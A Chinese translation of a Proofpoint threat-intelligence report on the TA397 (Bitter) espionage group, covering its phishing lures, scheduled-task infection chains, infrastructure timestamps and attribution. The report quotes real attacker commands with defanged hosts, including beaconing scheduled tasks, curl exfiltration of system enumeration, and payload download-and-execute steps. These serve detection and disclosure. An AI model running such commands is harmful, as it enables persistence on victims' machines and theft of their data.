苦涩结局：揭秘八年间谍丑闻（上）

这是一个由两部分组成的博客系列，详细介绍了与 Threatray 合作开展的研究。本系列博客的第二部分可在其网站上找到。 

分析师注：在整个博客中，研究人员已经消除了受 TA397 控制的指标并修改了某些技术细节以保护调查方法。 

主要发现 

• Proofpoint Threat Research 评估，TA397 很有可能是一个受政府支持的威胁行为者，负责为印度政府收集情报。 

• 该组织频繁尝试各种投放方法来加载计划任务。然而，由此产生的计划任务、PHP URL 模式、在信标中包含受害者的计算机名称和用户名，以及攻击者服务器上的 Let's Encrypt 证书，都为检测该组织活动提供了高度可信的指纹。  

• TA397 经常会针对那些在我国、巴基斯坦和印度次大陆其他邻国有利益或业务的欧洲组织和实体。  

• TA397 的实际操作和基础设施操作与印度标准时间 (IST) 时区的标准工作时间一致。  

概述 

TA397（Bitter）是一个间谍组织，长期以来一直以南亚实体为目标。虽然该组织经常被非公开地归咎于印度，但其背后的原因尚无明确记录。在本篇博文中，我们分享了证据，表明TA397是一个与印度结盟的威胁行为者，并发布了此前未披露的证据，表明该组织的目标范围已扩展到亚洲以外。在本系列博文的第一部分中，我们将探讨TA397的攻击活动、目标定位和有效载荷投递，并对TA397的基础设施进行深入分析。本系列博文的第二部分将在此基础上进一步深入研究TA397观察到的全部恶意软件库，重点介绍该组织的能力如何支持其间谍活动。我们与Threatray研究团队的联合研究旨在证实TA397是一个专注于间谍活动、受政府支持的威胁行为者，其任务是为印度政府的利益收集情报。 

TA397 的运营 

本节涵盖 Proofpoint Threat Research 在 2024 年 10 月至 2025 年 4 月期间观察到的一些我们认为与 TA397 有关的攻击活动。本博客第一部分中提到的攻击活动均在此时间段内进行。本节涵盖该组织的目标定位、用于发送钓鱼邮件的电子邮件账户类型、用于与合法流量混合的邮件主题、用于诱骗目标与附件或链接互动的诱饵，以及 TA397 用于向目标部署恶意负载的感染链。  

Proofpoint Threat Research 还对该组织的键盘操作行为有着独到的见解。本博客提供的数据为分析受害者提供了一个新的视角，并突显出该组织的收集目标范围远比之前记录的要广泛。 

宣传活动、受害者研究和诱惑 

通过长期跟踪和分析TA397的活动，我们发现该组织表现出了若干可观察的行为模式。这些模式为威胁研究人员提供了许多监控和检测TA397活动的机会。  

Proofpoint 观察到 TA397 经常针对极小部分目标。从地理位置来看，这种攻击几乎只针对与我国或印度邻国有联系的欧洲实体，也观察到一些针对我国和南美洲的攻击。虽然这可能更多地表明了其可见性偏见，但大多数关于该组织的公开报道都详细描述了 TA397 针对亚洲组织的活动。  

我们观察到的 TA397 攻击目标也高度体现了以间谍活动为重点的威胁行为者的特征。政府、外交机构和国防组织经常成为攻击目标，以便收集外交政策或时事情报，此外，它们还能帮助威胁行为者深入了解政府在政治问题、贸易谈判、国防合同或更广泛的经济投资方面的立场或决策过程。在分析威胁活动的目标和归因集群时，这些主题几乎肯定会与威胁行为者疑似来源国的地缘政治、经济或军事利益相呼应。TA397 活动的目标、主体和诱饵都表现出同样的特征，这与印度政府情报利益相关的活动相符。 

TA397 使用大量不同的电子邮件账户开展活动。该组织曾在免费邮件提供商（163[.]com、126[.]com 和 ProtonMail）以及巴基斯坦、孟加拉国和马达加斯加政府的多个被盗账户之间切换。在这些活动中，TA397 被发现伪装或冒充我国政府内部的多个机构，例如毛里求斯驻华大使馆、马达加斯加驻华大使馆、韩国外交部以及北京外交部办公室等。TA397 发件人账户使用的主题行，可以深入了解与该组织或目标目标相关的主题、话题和事件。Proofpoint 在 TA397 的活动中观察到的一些主题如下所示： 

• AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS AT THE LEVEL OF EXTERNAL REPRESENTATIONS 
• PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR 
• SituationNote : SouthKorea_Martial law Seoul Embassy Advisory 
• Invitation Embassy of the Islamic Republic of Pakistan Beijing Dec 2024. 
• EU Delegation 
• Key National Defense R&D Projects 
• Note from Embassy of Mauritius 13 December 2024 
• Fw:Fw:CN_5896_File_vers1 
• Fw: A/c Records : Beijing 
• Fw: Preferential Visa Rules Updates 2025 
• Protocol Guidelines for Diplomatic Missions 
• Department of Northeast Asia, Ministry of Foreign Affairs 
• Invitation Armed Forces Day 
• Re: Intermediate structure WA's 
• Ministry of Commerce File 

专注于间谍活动的威胁行为者经常在政治、外交、贸易、投资和国防领域活动。根据 Proofpoint 对该组织活动的了解，TA397 也不例外。如上所示，其中一些主题据称讨论与参与外交的欧洲组织相关的事务。此外，还有许多主题涉及我国、巴基斯坦和东北亚的外交或军事问题。其中一项活动与 2024 年 12 月韩国总统实施戒严的危机时间相吻合，其主题为“情况说明：韩国_戒严首尔大使馆咨询”，清楚地表明了威胁行为者如何试图通过利用目标可能在收件箱中阅读或看到的主题和内容来混入合法电子邮件流量。 

鉴于TA397的可疑归属，有两起攻击活动尤其引人关注。主题为“2025年公共投资项目_马达加斯加”和“毛里求斯大使馆2024年12月13日通知”的攻击活动都表明，TA397试图将电子邮件伪装成来自马达加斯加和毛里求斯大使馆的合法邮件（尽管在攻击活动中，发件人使用了我国的免费邮箱地址，并声称是毛里求斯驻华大使馆）。 

示例 TA397 诱饵电子邮件包含 RAR 封装的 CHM 附件。  

此次攻击可能反映出马达加斯加和毛里求斯都是印度的战略伙伴，两国关系涵盖贸易、能源、基础设施等领域。此外，从 2024 年初到 2025 年，印度已多次与马达加斯加和毛里求斯进行“联合海军演习、协调巡逻、信息共享、人道主义援助与救灾工作、能力建设和其他外交活动” 。根据文件内容和所使用的诱饵文件，很明显 TA397 毫不犹豫地伪装成其他国家的政府，包括印度的盟友。虽然 TA397 在这些活动中的目标是驻欧洲的土耳其和我国实体，但这表明该组织可能了解和掌握马达加斯加和毛里求斯的合法事务，并利用这些材料进行鱼叉式网络钓鱼活动。 

许多专注于间谍活动的威胁行为者经常在初始访问有效载荷或链接的同时发送诱饵文档或附带文件，以误导目标，并使其相信电子邮件的合法性。然而，在过去一年中，Proofpoint 仅观察到 TA397 在两次攻击中采取了此类行动：一次是之前发布的针对土耳其国防部门某个组织的攻击活动，另一次是针对位于我国的欧洲实体的攻击活动。 

虚假文件诱饵为包含恶意附件的网络钓鱼电子邮件增加合法性。 

TA397 开展的其余攻击活动仅包含纯文本正文消息，该组织伪装成合法的政府组织，并附带恶意附件或 URL。这种做法表明，与许多其他受政府支持的威胁行为者相比，该组织的网络钓鱼操作总体上缺乏成熟度。 

感染链 

TA397 或许并未展现出高级攻击能力，但该组织高度活跃，频繁且持续地开展攻击活动。尽管该组织似乎始终依赖一套“久经考验”的方法，但 TA397 也展现出尝试新型感染链以绕过检测或利用漏洞的能力。 

初始访问 

鱼叉式网络钓鱼电子邮件仍然是 TA397 首选的初始访问技术，到目前为止，我们还没有发现任何报告表明该组织使用其他方法。话虽如此，该组织的鱼叉式网络钓鱼策略已经发展并表现出一定程度的灵活性。虽然在 2019/2020 年，TA397 依赖于利用CVE，使用ArtraDownloader部署其他有效载荷，甚至尝试使用Android 恶意软件，但据Proofpoint、Ahnlab、StrikeReady Labs、Cisco Talos和其他公司报告，该组织近年来一直表现出对计划任务的偏好。在历史操作中，ArtraDownloader 在HTTP(S) POST C2 信标中对受感染机器的用户名和计算机名称进行编码。这些数据会定期发送到 C2 服务器，大概是允许参与者手动评估受害者是否满足某些定位标准，如果是，则传递第二阶段的有效载荷。 TA397 今天继续采用相同的方法，使用计划任务（详见下文）。 

我们观察到的攻击活动中的电子邮件通常包含直接附件或 URL，这些 URL 利用合法的文件共享服务来传递文件，然后启动计划任务。即使文件直接附加到电子邮件中，最终也会导致计划任务的创建。在某些情况下，文件在执行前会被打包到存档中，因为攻击者会尝试更高级的技术。 

例如，在 2024 年末，即在 NTFS 文件系统中使用备用数据流后不久，Proofpoint 观察到 TA397 使用了一种深奥的文件类型：Microsoft Search Connector (MSC) 文件，这种文件允许用户连接存储在 Web 服务或远程存储位置的数据。这是该组织用来将 LNK 文件投放并启动到受感染计算机并创建计划任务的新策略。我们将在下面更详细地介绍此链，包括后续的键盘操作活动。这些搜索连接器是 Microsoft XML 文件，其滥用方式与库文件或已保存的搜索文件类似。在过去几年中，滥用 WebDAV 下载有效载荷已成为威胁形势中各个团体的趋势。据报道，这种特定的搜索连接器技术在 2023 年存在安全风险，但 TA397 首次使用它是在 2024 年末。 

在 2024 年末的 TA397 活动中，研究人员发现了另一种神秘的文件类型。这些电子邮件包含一个 RAR 压缩包，其中包含一个MSC 文件。如果用户双击并运行该文件，MSC 会启动 mmc.exe，该文件会设置一个计划任务，尝试使用 PowerShell 下载并运行下一阶段的有效载荷。在此次活动中，TA397 利用了 CVE-2024-43572（也称为GrimResource），该漏洞允许攻击者在目标终端上以 mmc.exe 为上下文执行远程代码。该漏洞于 2024 年 6 月首次公开报告，Threat Research 于 2024 年 10 月首次观察到 TA397 使用此文件类型。 

多年来，TA397 尝试了各种删除或创建计划任务的方法。然而，计划任务本身基本保持不变，我们将在下一节中重点介绍这一点。用于通过 cmd.exe 或 PowerShell 启动计划任务的文件类型包括 MSC、LNK、CHM、MS Access、IQY 文件等。 

自 Proofpoint 于 2021 年开始追踪 TA397 以来，我们尚未观察到该组织使用尚未公开披露或报告的零日漏洞或技术。该组织可能还会密切关注威胁态势，并采用“久经考验”的初始访问载荷方法，使用任何被证明有效的方法。该组织在计划任务方法上保持一致，但在最终载荷方面往往会有所不同（请参阅后续章节）。 

下图概述了观察到的初始访问感染链： 

TA397 感染链概述。 

计划任务 

以下计划任务命令行示例展示了该任务如何每 16 分钟向暂存域 woodstocktutors[.]com 发送一次信标，等待指令以检索下一阶段的有效载荷。在沙盒环境中执行这些样本时，未投放任何其他有效载荷。然而，如果允许其运行更长时间，最终会投放下一阶段的有效载荷。此行为似乎是手动的，可能是由攻击者在评估某些选择标准（例如受害者的 IP 地址、计算机名称和用户名）后触发的，这些标准已通过信标发送到服务器。 

"C:\Windows\System32\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\Users\public\kwe.cc"; Get-Content "C:\Users\public\kwe.cc" | cmd"

该组织尝试了各种 PowerShell 和命令行工具（例如 curl、conhost 等）以及混淆方法，但核心功能保持不变。以下是另一个示例，其中展示了一个经过混淆的 PowerShell 命令，该命令创建了一个计划任务，每 18 分钟向 princecleanit[.]com 发送一次信标： 

schtasks /create /tn \"Task-S-1-5-42121\" /f /sc minute /mo 18/tr \"conhost --headless cmd /v:on /c set gz=ht& set gtz=tps:& set 7gg=!gz!!gtz!& set 6hg=!7gg!//p^rin^ce^cle^anit.co^m& c^ur^l !6hg!/d^prin.p^hp?dr=%computername%;%username%|c^m^d\"

在我们对该组织的持续追踪中，Proofpoint Threat Research 在创建计划任务时发现了 TA397 的签名。该组织将 PHP URI 请求构造为使用计算机名和用户名的组合（中间包含不同的字符）发送到临时基础设施，这可能是为了绕过静态检测。多年来，这种情况一直存在，正如以下在 TA397 历史活动中观察到的示例所示。 

blucollinsoutien[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAMEhxxp://46.229.55[.]63/svch.php?li=%computername%..%username% hxxp://95.169.180[.]122/vbgf.php?mo=%computername%--%username% hxxp://inizdesignstudio[.]com/lk.php?xm=$env:computername*$env:usernamehxxp://trkswqsservice[.]com/turf.php?xm=$env:COMPUTERNAME*$env:USERNAMEhxxp://woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAMEhxxps://princecleanit[.]com/dprin.php?dr=%computername%;%username% hxxps://utizviewstation[.]com/dows.php?cb=$env:COMPUTERNAME*$env:USERNAMEhxxps://www[.]headntale[.]com/lchr.php?ach=%computername:~0,15%_%username:~0,5% hxxps://www.mnemautoregsvc[.]com/GIZMO/flkr.php?sa=COMPUTERNAME**USERNAME jacknwoods[.]com/jacds.php?jin=%computername%_%username% utizviewstation[.]com/sdf.php?fv=$env:COMPUTERNAME*$env:USERNAMEwarsanservices[.]com/mydown.php?dnc=%username%_%computername% warsanservices[.]com/myupload.php?dnc=%username%_%computername%

检查这些临时域名使用的 TLS 证书后发现，它们大多数都依赖于标准的 Let's Encrypt 证书。我们对这些证书进行了时间戳分析，详情请参阅基础设施分析部分。 

以下是 princecleanit[.]com 暂存域的示例： 

princecleanit[.]com 来自 Censys 的 TLS 证书。 

典型特征： 

• Subject DN: CN=*.<domain> 

• Issuer DN: C=US, O=Let’s Encrypt, CN=R[0-9]+ 

• Validity Period: 90 days 

这些特征为该攻击者的初始访问技术提供了检测机会：持续使用计划任务、特定的 PHP URL 模式、在信标中包含受害者的计算机名称和用户名，以及服务器端存在 Let's Encrypt 证书。这些特征共同构成了高度可信的指纹，强烈表明该活动与 TA397 有关。 

TA397 的计划任务和基础设施的指纹。 

动手键盘活动 

在研究过程中，我们观察到TA397参与了手动操作键盘的活动。具体来说，该组织投放了一个RAT，不久后又投放了第二个。这很可能是攻击者在印度传统工作时间进行的直接手动操作。 

正如Proofpoint 之前关于 TA397 的博客所述，我们详细介绍了 wmRAT 和 MiyaRAT 的手动部署，此后我们观察到 TA397 在针对政府组织的两个不同活动中参与了实际操作活动。 

第一个案例是之前重点介绍的使用搜索连接器文件格式的活动，其中该组织使用这种新技术来删除一个 LNK 文件，该文件会在目标机器上加载计划任务。 

"C:\Windows\System32\cmd.exe" /start min /c schtasks /create /tn"OneDrive\OneDrive Standalone Update Task-S-1-5-21-9920643986-2299988379" /f /sc minute /mo 19 /tr "conhost --headless cmd /v:on /cset765=ht& set665=tp:& set565=!765!!665!& set465=!565!//46.229.55[.]63& curl !465!/sv^c^h.p^h^p?li=%computername%..%hostname%c^m^d"& msg * "ERROR 0XA008CE : ERROR reading File, contents are corrupted."

该 LNK 文件使用 cmd.exe 设置了一个名为“OneDrive\OneDrive Standalone Update Task-S-1-5-21-9920643986-2299988379”的计划任务，该任务尝试使用 conhost.exe 每 19 分钟下载并运行一次下一阶段的有效载荷。为此，该计划任务向 hxxp://46.229.55[.]63/svch[.]php?li=%computername%..%username% 创建了一个 curl 请求，其中包含受影响目标计算机的详细信息。此外，它还向用户显示了一条诱饵错误消息，提示无法查看原始文件。 

这项计划任务持续运行了 18 个小时，直到 Proofpoint 在 UTC 时间 05:27（IST 时间 10:57）首次观察到来自 TA397 的响应： 

HTTP/1.1200 OK Date: Thu, 05 Dec 202405:27:59 GMT Server: Apache/2.4.62 (Ubuntu) Content-Length:330Content-Type: image/jpeg Cache-Control: no-cache cd C:\programdata dir > abc1.pdf tasklist >> abc1.pdf wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get >>abc1.pdf wmic logicaldisk get caption >> abc1.pdf systeminfo >> C:\programdata\abc1.pdf curl -X POST -F "file=@C:\programdata\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> del abc1.pdf

此枚举本质上与 Proofpoint 在我们之前关于 TA397 的博客文章中详述的枚举相同，但添加了 systeminfo 命令。在请求中，攻击者向暂存域上的另一个 PHP 端点发出了包含此目标计算机信息的 POST 请求：

/svupfl[.]php?oi=%computername%_%username%.

十八分钟后，我们观察到了以下请求： 

HTTP/1.1200 OK Date: Thu, 05 Dec 202405:46:59 GMT Server: Apache/2.4.62 (Ubuntu) Content-Length: 381Content-Type: image/jpeg Cache-Control:no-cache cd C:\programdata set /P ="MZ" < nul >> sh1.txt" curl -o sh2.txt <hxxp://173.254.204[.]72/sh2.txt> copy /b sh1.txt+sh2.txt shh.execurl -o dune64.log <http://173.254.204[.]72/dune64.log> ren dune64.log dune64.bin shh.exe dune64.bin dir > abc1.pdf tasklist >> abc1.pdf curl -X POST -F "file=@C:\programdata\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> del abc1.pdf

在这种情况下，TA397 操作员发出 curl 命令尝试从以下位置检索有效载荷，从而犯了一个错误：

hxxp://173.254.204[.]72/dune64.log

然而，由于攻击者未在其服务器上放置同名文件，此请求返回了 404 错误，导致重命名命令和 shh.exe 执行失败。结果发现，下一阶段位于 /dune64.bin 下。当 Proofpoint 分析师同时执行 shh.exe 有效载荷和 dune64.bin 二进制文件时，整个攻击链正确执行。通过分析这些有效载荷，我们确定 shh.exe 是KugelBlitz，dune64.bin 是来自 Havoc C2 框架的 Demon 代理。我们发现该变体通过 443 端口与 72.18.215[.]108 进行通信。 

在该攻击者首次尝试加载后门失败后，我们在 UTC 时间 08:57（IST 时间 14:27）观察到了另一个请求： 

HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 08:57:00 GMT Server: Apache/2.4.62 (Ubuntu) Content-Length: 263 Content-Type: image/jpeg Cache-Control: no-cachecd C:\programdata net use Z: \\72.18.215[.]1\tempy Z: Z:\shl.exe dune64.bin C: net use /delete Z: /y whoami dir > abc1.pdf tasklist >> abc1.pdf curl -X POST -F "file=@C:\programdata\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> del abc1.pdf

在本例中，TA397 尝试执行与三小时前相同的攻击链，这次选择通过挂载名为 tempy 的 SMB 共享，从另一台受攻击者控制的服务器中提取完整的有效载荷。通过枚举此共享，Proofpoint 发现 TA397 还在驱动器上存储了 wmRAT 和 MiyaRAT 有效载荷，这些二进制文件与我们在 2024 年 12 月博客中提到的完全相同。此外，在 TA397 的驱动器中，Proofpoint 发现了两个可能从受害者那里窃取的文档。 

第一份文件是孟加拉国政府官方税务文件的扫描件。出于匿名和安全考虑，我们已从博客中删除了此信息。第二份文件是一份战略军事文件，似乎来自孟加拉国的一个军事组织。出于这些原因，我们选择将其从本出版物中删除。这两份文件似乎都是手写文件的复印件或扫描件。这两份文件很可能是合法的，而且很可能是从TA397的受害者那里窃取的。此次攻击与TA397的历史活动一致，并进一步表明这两个组织都是TA397间谍活动的常规收集目标。 

Proofpoint 观察到的第二起动键盘活动案例是使用 CHM 文件的群体更常见的感染链。 

该邮件似乎是与另一位收件人的讨论帖，目的是让附件看起来更真实。邮件中包含一个 RAR 压缩的 CHM 文件。如果用户双击并运行该文件，它会设置一个 MSTaskUI 计划任务，该任务会尝试通过 conhost.exe 使用 PowerShell，每 16 分钟使用 curl 实用程序下载并运行下一阶段的有效载荷。 

"C:\Windows\System32\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "MSTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "utizviewstation[.]com/sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\Users\public\documents\vfc.cc"; Get-Content "C:\Users\public\documents\vfc.cc" | cmd"

Proofpoint 观察到 TA397 操作员在 UTC 时间 10:40（IST 时间 16:20）使用手动命令响应这些正在进行的计划任务请求，发出枚举目标机器的命令并发送包含该信息的 POST 请求。 

tree "%userprofile%\Desktop" /f > C:\Users\Public\Documents\d.logsysteminfo >> C:\Users\Public\Documents\d.logWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List >> C:\Users\Public\Documents\d.logwmic logicaldisk get name >> C:\Users\Public\Documents\d.logcd C:\Users\Public\Documents curl -X POST -F "[email protected]" hxxps://www.utizviewstation[.]com/urf.php?mn=%computername% del d.log

与该组织先前观察到的手动键盘活动类似，包含受感染机器信息的 POST 请求被定向到相同的暂存域，但与计划任务的 PHP URI /urf.php?mn=%computername% 不同。Proofpoint 观察到 TA397 根据受感染机器上提供的系统信息避免投放下一阶段的有效载荷。计划任务中发送到暂存域的计算机名称和信息很可能经过了某种形式的预过滤。此选择标准与先前报道的有关ArtraDownloader的使用标准类似。这也可能是为什么参与者在使用计划任务方面保持一致，同时改变其初始访问方法和最终有效载荷的原因。他们的选择标准是其整个流程的关键部分，表明间谍活动具有高度的针对性。 

在 UTC 时间 13:37（IST 时间 19:07），我们观察到攻击者服务器发出了以下响应： 

curl -o C:\ProgramData\msuitl.tar hxxp://utizviewstation[.]com/msuitl.tar cd C:\ProgramData tar -xvf msuitl.tar dir > t0.logmsuitl.exetasklist >> t0.logcurl -X POST -F "[email protected]" hxxps://www.utizviewstation[.]com/urf.php?mn=%username% del t0.log

这向域上的 /msuitl.tar 端点发出了一个请求，并丢弃了最终的有效载荷：

HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: application/x-tar last-modified: Mon, 03 Feb 2025 11:23:10 GMT accept-ranges: bytes content-length: 45568 date: Mon, 03 Feb 2025 13:37:21 GMT server: LiteSpeed Cache-Control: no-cache msuitl.exe

从响应标头可以看出，终端在首次枚举受感染机器后43分钟被修改，这表明TA397有意将精心挑选的有效载荷加载到暂存基础设施中。这种有效载荷的选择很可能与目标选择以及从初始枚举中收集到的信息直接相关。此次攻击活动的最终有效载荷是BDarkRAT，您可以在Threatray博客上这篇文章的第二部分中找到它。 

虽然 TA397 的初始访问媒介一直是鱼叉式网络钓鱼电子邮件，并且该组织入侵链的第一部分采用了多种技术，但据观察，该组织部署的恶意软件负载的广度相当大。 

下图绘制了我们在印度标准时区（IST）周一至周五工作时间内观察到的键盘操作活动的时间戳： 

观察到的动手键盘活动时间戳的热图。 

基础设施分析 

时区分析已被证明是一种有效的间谍组织溯源方法——不仅适用于亚洲间谍组织，也适用于 TA397，正如Bitdefender 在 2020 年以及我们在实际操作活动中观察到的那样。在 Bitdefender 的研究中，我们对 TA397 恶意软件中使用的代码签名证书的创建时间戳以及样本的 ZIP 文件时间戳进行了分析，结果显示它们映射到印度标准时间 (UTC +5:30)，并遵循周一至周五朝九晚五的工作时间。 

为了开展这项研究，我们从内部遥测、数据透视和公开报告中收集了122 个已知的 TA397 C2 和临时域名，这些域名的跨度自该组织首次公开报道以来已有数年。对于每个域名（如有），我们收集了以下三个时间戳： 

• 被动 DNS 首次看到时间戳； 

• 来自 WHOIS 数据的域名创建时间戳； 

• 来自 Let's Encrypt 证书的 TLS 证书创建时间戳。 

将所有时间戳转换为印度标准时间 (IST) 后，我们生成了三个独立的热图，每个数据源一个。为了更好地可视化，标准的“工作时间”用虚线标记。数据大致符合这种模式，或者至少表明了一个清晰的趋势。 

被动DNS： 

被动 DNS 首次出现时间戳的热图。 

由于各种原因，域名注册和被动 DNS 数据库中记录的第一个时间戳之间可能会有延迟，因此出现异常值并不意外。 

WHOIS信息： 

WHOIS 域名注册时间戳的热图。 

WHOIS 数据提供了域名注册信息。为了进行这项研究，我们直接查询了WHOIS 数据库。由于我们处理的是历史数据，因此研究中并非所有域名的创建日期都可用（例如，域名到期后从数据库中移除）。数据显示，周五的“午餐时间”尤为突出，因为攻击者在同一天几分钟内注册了多个域名。从逻辑上讲，这表明基础设施团队的一名成员很可能在一次“会话”中注册了多个域名，而不是一次只注册一个。 

证书： 

从时间戳开始有效的 Let's Encrypt 证书热图。 

在本研究中，我们使用Censys查找与每个域名关联的 TLS 证书，并查询了证书创建时间戳。我们仅纳入了使用 Let's Encrypt 证书的数据点，因为此前已将其确定为该组织基础设施的指标。我们面临的挑战之一是，一些历史 C2 和临时域名已不再活跃——要么已过期，要么已重新注册——因此选择正确的 Let's Encrypt 证书对于确保分析的准确性至关重要。一些注册商和提供商提供自动续订过期证书或在域名注册后颁发 TLS 证书的服务。本研究中分析的域名涵盖了各种托管服务提供商。 

将所有数据源组合成一个热图可得出以下结果： 

被动 DNS、WHOIS 和证书时间戳的组合热图。 

域名创建和 TLS 证书颁发之间存在明显差异。以下是两个示例数据点——一个是 C2 域名，另一个是临时域名——这些域名是在相应的 TLS 证书颁发前几天注册的。相关的攻击活动是在颁发证书后的几天开始的。所有时间戳均与印度标准时间一致，并且有明显迹象表明，大多数与基础设施相关的活动都发生在该时区的标准工作时间内。 

归因 

追踪国家支持的间谍活动始终是一项挑战。然而，通过分析行为者行动各个环节的多重信号汇聚，我们可以评估观察到的活动的动机和来源。 

TA397 是一个专注于间谍活动的威胁行为体，极有可能代表印度情报机构开展行动。根据我们的遥测数据，TA397 主要针对亚洲和欧洲的政府和国防组织，尤其关注与我国、巴基斯坦以及印度次大陆其他邻国有关系或利益的实体。 

TA397 伪装成马达加斯加、毛里求斯等国的外交机构、大使馆和政府机构，表明其不仅了解这些国家的合法事务，还利用这些知识来增强其鱼叉式网络钓鱼行动的合法性。此外，TA397 使用合法或伪造的诱饵文件、主题行和正文内容，涉及政府内部或外国事务，表明其非常熟悉政府的常规做法。TA397 拥有孟加拉国军方和税务机关签发的可能合法的内部文件，这与 TA397 为印度国家利益执行情报任务的评估高度一致。 

我们对实际操作活动的观察显示，在第一个观察到的案例中，TA397 在休眠数小时的计划任务信标之后，于 05:27 UTC 开始响应，并在 05:46 UTC 和 08:57 UTC 观察到后续活动。在第二个案例中，活动开始于 10:40 UTC。在 11:27 UTC 观察到对 TA397 服务器的修改，最终的后续有效载荷交付于 13:37 UTC。这与公众的评估一致，即如果调整到印度标准时间或类似时区，TA397 是一个来自南亚的威胁行为者。但是，我们对 TA397 庞大基础设施的分析表明了该组织遵循的运营模式。有明确迹象表明，大多数与基础设施相关的活动发生在 IST 时区的标准工作时间内。 

正如本系列博客第二部分与Threatray合作所报道的，TA397与其他已知的印度威胁行为者（例如神秘大象/APT-K-47和孔子）的工具存在重叠，即使用ORPCBackdoor。这有力地表明，TA397是印度政府支持的威胁行为者工具共享生态系统的一部分。然而，还需要更多研究来确定这些组织是否能够访问中央“军需品”——即其所属组织内部或外部的开发资源。 

指标